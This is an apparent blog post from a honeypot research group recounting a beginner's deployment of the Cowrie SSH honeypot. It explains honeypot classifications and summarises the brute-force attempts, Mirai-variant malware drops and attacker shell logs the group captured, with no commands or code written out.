A Beginner's Tale of Honeypots
You may have come across the term honeypot either when studying or working in the cyber security industry. What is a honeypot? According to Wikipedia, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorised use of information systems.
How I see a honeypot is a system deliberately configured to gather data on the latest cybersecurity landscape and also to test a hypothesis. The mirror of honeypots in the real world is honeytrap which involves the use of romantic relationships for interpersonal, political, or monetary purposes.
Honeypots can collect a wide range of data. This can range from simple data such as IP address, domain names or domain name system (DNS) queries and usernames/passwords brute force combinations to more complex data such as malware drops or cryptominers. However, this information if not analysed will just be threat data. Performing a general analysis will yield threat information, which provides you an overview of the cyber security landscape. The holy grail is to derive threat intelligence from all of this information by combining it with context. Threat data and information becomes threat intelligence when it produces actionable information.
Deep dive into honeypots
Honeypots can be classified by deployment or by their interaction level. For deployment, there are 2 types, namely production honeypots and research honeypots.
Production honeypots are placed in a live organisation network to detect threats or malicious actors in their network.
For research honeypots, you could probably infer from the name that these honeypots are used for research purposes. They are usually created to gather information on the latest threat landscape or malware.
Another way is to classify them either as low interaction or high interaction honeypots. Low interaction honeypots are also sometimes referred to as low-medium interaction honeypots. These honeypots essentially emulate a certain service, for example, Cowrie emulates an SSH service while Mailoney emulates the SMTP service. Low interaction honeypots have certain drawbacks, such as the inability to fully replicate all running services. Hence, if an attacker runs a command that has not been handled by this system and it crashes, the attacker may figure out that he is inside a honeypot. An advantage of low interaction honeypots is they can be started by running a simple script, so it is relatively easier to start as a beginner.
High interaction honeypots on the other hand are actual machines or networks deliberately configured to be vulnerable. It can be highly realistic, given that they are actual machines. This setup can be much harder and more expensive to maintain if you are looking to implement a complex network that mimics a corporate network. Moreover for Cowrie, since the TTY logs are captured by IP address and stored in a file, it is quite easy to use this data. Unfortunately in a high interaction honeypot, the easiest way seems to be to rely on the OS logging mechanism. An example of where to find TTY logs is the .bash_history file in the user’s home directory for a system running the Linux Operating System. The .bash_history file does not store the time of the command executed. This file is prone to tampering and commands can be added or deleted into the file.
The different classifications of honeypots are not mutually exclusive. Depending on the desired goal of the honeypot, a research honeypot can be a high or low interaction honeypot and the same is true for a deployment honeypot.
Insights gained from this deployment
The Honeynet Quarter (HNQ) has been exploring open-source honeypots and the first honeypot we decided to start with is Cowrie. Cowrie is a medium interaction SSH honeypot designed to log brute force attacks and shell interactions performed by the attackers, and capture malware drops. Cowrie also supports a high interaction system where it acts as a proxy to an actual system and monitors the traffic. However we will not be touching on this as we have not tried it out yet. (Maybe the next writeup? 😉) This article is not a step by step guide of how to set up a Cowrie honeypot but rather to share some insights that we gained from it. The documentation from Cowrie’s GitHub repo should provide sufficient information for you to set up one.
We experimented with this honeypot back in July-September 2020. Our setup consisted of a server running an instance of Cowrie, which forwards the logs to another server running the Elastic Stack, allowing us to parse and easily search the logs.
We collected lots of data in a span of about 2 months. Our configuration of Cowrie was set up to accept any password with the username root, and we received many connections within the first few hours. Over the course of the next few weeks, we saw even more connections, shell interactions, malware drops etc. Given that Cowrie stores the malware drops as an SHA-256 hash as its filename, this makes it very easy to validate on VirusTotal if this file has been seen before. It is a good practice not to upload the file to VirusTotal to ensure that the attacker will not be “notified” that we have discovered them, especially when it is a new piece of malware. From our observations, most of the malware samples we managed to collect were variants of the Mirai botnet. Another observation appeared to be automated attacks that would likely target other similar IPs with an SSH service exposed to the internet.
Here are some statistics. In total, we have a total of 24 unique malware samples and 62 unique TTY logs (what the attacker saw on the command line while running commands and interacting with the honeypot).
Attached are some samples of some of the malware and TTY logs we captured. The SHA-256 hash has also been provided. Note that only basic analysis has been performed on the malware, such as checking if it has already been “seen in the wild”, meaning other honeypots and researchers already know of this malware's existence and examining the file type.
Looking at the file header in the 2nd image, we can see that it starts with “ELF” which is usually used for Linux systems.
The file was similar to Sample 2 and is an ELF file.
One of the unusual files had virus engines marking it as malicious even though it seems to be an SSH Key.
We also found 2 malware hashes with no match on VirusTotal:
Running a file command to do a simple investigation on the file shows that it is an ELF file, a Linux executable.
Here is an example for a TTY log captured. It attempts to download a file from an IP address and attempts to execute it.
Overall, it was a good experience for a beginner, as it was easy to set up and we had lots of data to play with. It provided a view of the general landscape and would have allowed us to harvest malicious IPs, or popular username/password combinations used by attackers.
However, having lots of data has its downsides too as it is very easy to become overwhelmed in the sea of data. Yes, we had lots of IP addresses, domains, malware samples, but this will remain only as data if they are not analysed and added with context to become threat information or threat intelligence.
There are also several other considerations to take into account when choosing to use a low-medium interaction honeypot. For example, we noticed Cowrie crashing as it couldn’t handle certain commands or the way it attempts to download certain files. Moreover, there are services that check whether a machine is a honeypot such as “Honeypot or Not?” by Shodan (https://honeyscore.shodan.io/).
Moving on, we can definitely experiment with other low-medium interaction honeypots for experience to learn more about their service and also the general attack patterns. We can also move on to building high interaction honeypots/networks and plant “breadcrumbs” or small pieces of information around such that a breach almost cannot be automated. Lastly, it is important to hone the log and malware analysis skills so that we can derive better insights from our data.
Written By: Hugo Chia
Other Contributors: Emil Tan & Hoo Jun Hong